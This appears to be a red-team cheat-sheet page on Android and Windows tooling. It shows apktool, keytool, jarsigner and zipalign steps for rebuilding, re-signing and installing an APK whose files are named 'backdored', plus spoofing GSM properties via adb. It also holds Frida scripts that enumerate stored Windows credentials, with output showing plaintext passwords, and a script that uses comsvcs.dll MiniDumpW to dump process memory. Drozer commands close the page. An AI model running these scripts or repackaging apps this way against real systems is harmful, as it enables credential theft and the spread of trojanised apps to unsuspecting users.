Red Teaming
Malware Analysis
IoT / Reverse / Firmware
Basic tips
Getting certificate details from an apk
1
Getting certificate details from an apkkeytool -printcert -jarfile file.apk
Copied!
apktool - decode and compile APK
1
java -jar .\apktool.jar decode -r 'C:\tmp\xxxxx.apk'
2
3
(inside the decompiled APK (root))
4
java -jar ..\apktool.jar build -o c:\tmp\new.apk C:\Tools\android\apk_folder
5
6
I: Using Apktool 2.5.0
7
I: Checking whether sources has changed...
8
I: Smaling smali folder into classes.dex...
9
I: Checking whether sources has changed...
10
I: Smaling smali_classes2 folder into classes2.dex...
11
I: Checking whether resources has changed...
12
I: Copying raw resources...
13
I: Copying libs... (/lib)
14
I: Copying libs... (/kotlin)
15
I: Copying libs... (/META-INF/services)
16
I: Building apk file...
17
I: Copying unknown files/dir...
18
I: Built apk...
19
PS C:\Tools\android\>
Copied!
Create keystore key
1
cd C:\Program Files\Java\jre1.8.0_251\bin
2
keytool.exe -genkey -v -keystore c:\tmp\.keystore -keyalg RSA -keysize 2040 -validity 365 -alias baws
3
4
(...)
5
Generating 2,040 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 days
6
for: CN=123, OU=123, O=123, L=123, ST=123, C=123
7
[Storing c:\tmp\.keystore]
Copied!
Sign apk with jarsigner
Here, you need to use the alias created when you created the keystore file (baws, in this case).
1
cd C:\Program Files\AdoptOpenJDK\jdk-11.0.11.9-hotspot\bin
2
jarsigner.exe -sigalg SHA1withRSA -digestalg SHA1 c:\tmp\new.apk baws -keystore C:\tmp\.keystore
3
4
(...)
5
Enter Passphrase for keystore:
6
jar signed.
7
8
Warning:
9
The signer's certificate is self-signed.
Copied!
Align APK to avoid errors
After sign an APK, if you got some erros such as "Failed to extract native libraries, res=-2]", probably you need to align the APK.
1
.\adb.exe install C:\tmp\backdored.apk
2
Performing Streamed Install
3
adb: failed to install C:\tmp\backdored.apk: Failure [INSTALL_FAILED_INVALID_APK: Failed to extract native libraries, res=-2]
Copied!
Attention: You must use zipalign at one of two specific points in the app building process, depending on the app signing tool you use:
- If you use apksigner, only run zipalign before signing the apk file. If you sign your APK using apksigner and make other changes to the APK, the signature will be invalidated.
- If you use jarsigner, only run zipalign after signing the APK file.
As I used jarsigner, my last step is align the APK before installing it.
1
zipalign -p -f -v 4 backdored.apk backdored-aligned.apk
2
3
--now--
4
.\adb.exe install C:\tmp\backdored.apk
Copied!
Execute target activity via ADB
First, check on the Android-Manifest.xml file the package name. It can be found on the first line of the XML file (<?xml version="1.0" encoding="utf-8" standalone="no" ... package="com.x.x.x.x" ...)
Next, pick a target activity, and add the android:name="com.x.x.com.x..v2.ui.dashboard.DashboardActivity"> ..
😇
1
.\adb.exe shell am start com.xxx.xxx.xxx/com.xxx.xxx.v2.ui.dashboard.DashboardActivity
Copied!
Add GSM
1
adb shell
2
setprop gsm.operator.numeric 64304
3
setprop gsm.sim.operator.numeric 64304
4
setprop gsm.sim.operator.alpha target
5
setprop gsm.operator.alpha target
6
setprop gsm.sim.operator.iso-country us
7
setprop gsm.operator.iso-country us
8
9
--validate--
10
getprop |grep gsm
Copied!
Frida enumerate users creds (Windows)
Release Frida 14.2.18 · frida/frida
GitHub
1
function EnumerateGenericCredentials(credname){
2
const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateW");
3
const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
4
const count = Memory.alloc(8);
5
const pCredentials = Memory.alloc(8);
6
const ret = CredEnumerate(NULL, 0, count, pCredentials);
7
if(ret){
8
console.log("Enumerate complete! Found " + count.readInt() + " entries.");
9
10
for(var i=0; i<count.readInt(); i++){
11
const curr = pCredentials.add(i*8).readPointer();
12
console.log(curr.readByteArray(256));
13
}
14
15
}
16
}
17
18
19
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
20
Enumerate complete! Found 1 entries.
21
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
22
00000000 18 41 e0 1c 37 02 00 00 00 00 00 00 02 00 00 00 .A..7...........
23
00000010 70 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00 pA..7...........
24
00000020 a8 78 32 15 34 6c d7 01 00 00 00 00 00 00 00 00 .x2.4l..........
25
00000030 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 ................
26
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
27
00000050 7e 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00 ~A..7...........
28
00000060 74 00 65 00 73 00 74 00 65 00 31 00 00 00 75 00 t.e.s.t.e.1...u.
29
00000070 73 00 65 00 72 00 31 00 00 00 00 00 00 00 00 00 s.e.r.1.........
30
00000080 00 00 00 00 00 00 00 00 1e 88 b1 e6 00 12 00 80 ................
31
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
32
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
33
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
34
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
35
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
36
000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
37
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
38
39
40
---2nd example---
41
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
42
Enumerate complete! Found 2 entries. pCredentials=0x1f3e83c2470
43
Credentials at 0x1f3e6184310 ret: 0x1
44
teste1:user1:null
45
Credentials at 0x1f3e6184378 ret: 0x1
46
teste2:user2:pass2
47
---------------------------------------------
48
function EnumerateGenericCredentials(credname){
49
const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateA");
50
const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
51
const count = Memory.alloc(Process.pointerSize);
52
const pCredentials = Memory.alloc(256);
53
const ret = CredEnumerate(NULL, 0, count, pCredentials);
54
if(ret){
55
console.log("Enumerate complete! Found " + count.readInt() + " entries. pCredentials="+pCredentials);
56
57
for(var i=0; i<count.readInt(); i++){
58
const curr = pCredentials.readPointer().add(i * Process.pointerSize).readPointer();//.add(Process.pointerSize*2);
59
60
console.log("Credentials at " + curr + " ret: " + ret);
61
const targetname = curr.add(8).readPointer().readAnsiString();
62
const size = curr.add(32).readU32();
63
const blob = curr.add(40).readPointer();
64
const username = curr.add(72).readPointer().readAnsiString();
65
const password = blob.readUtf16String();
66
console.log(targetname + ":" + username + ":" + password);
67
}
68
}else{
69
console.log("ret is false!");
70
}
71
}
72
73
--3rd example---
74
[Remote::c:\windows\system32\cmd.exe]-> GetGenericCredentials("teste2")
75
CredReadA is 0x7ffdd7e44e90
76
Credentials at 0x1f3e83c23e0 ret: 0x1
77
user2:pass2
Copied!
Frida minidump - Windows
1
function MiniDump(pid, dumpname){
2
const LoadLibraryW_ptr = Module.getExportByName("kernel32", "LoadLibraryW");
3
const LoadLibraryW = new NativeFunction(LoadLibraryW_ptr, "int", ["pointer"]);
4
LoadLibraryW(Memory.allocUtf16String("comsvcs.dll"));
5
6
const MiniDumpW_ptr = Module.getExportByName("comsvcs", "MiniDumpW");
7
const MiniDumpW = new NativeFunction(MiniDumpW_ptr, "int", ["uint32", "uint32", "pointer"]);
8
9
const cmd = pid + " " + dumpname + " full";
10
console.log("Running MiniDump(" + cmd + ")");
11
MiniDumpW(0, 0, Memory.allocUtf16String(cmd));
12
}
13
14
[Remote::c:\windows\system32\cmd.exe]-> MiniDump(108, "c:\\Users\\user\\Desktop\\dump.asd")
Copied!
Drozer: Android App enumeration
1
adb install drozer-agent-2.x.x.apk
2
drozer console connect --server 192.168.0.10
Copied!
Basic commands below:
Drozer Tutorial
HackTricks
Last modified 10mo ago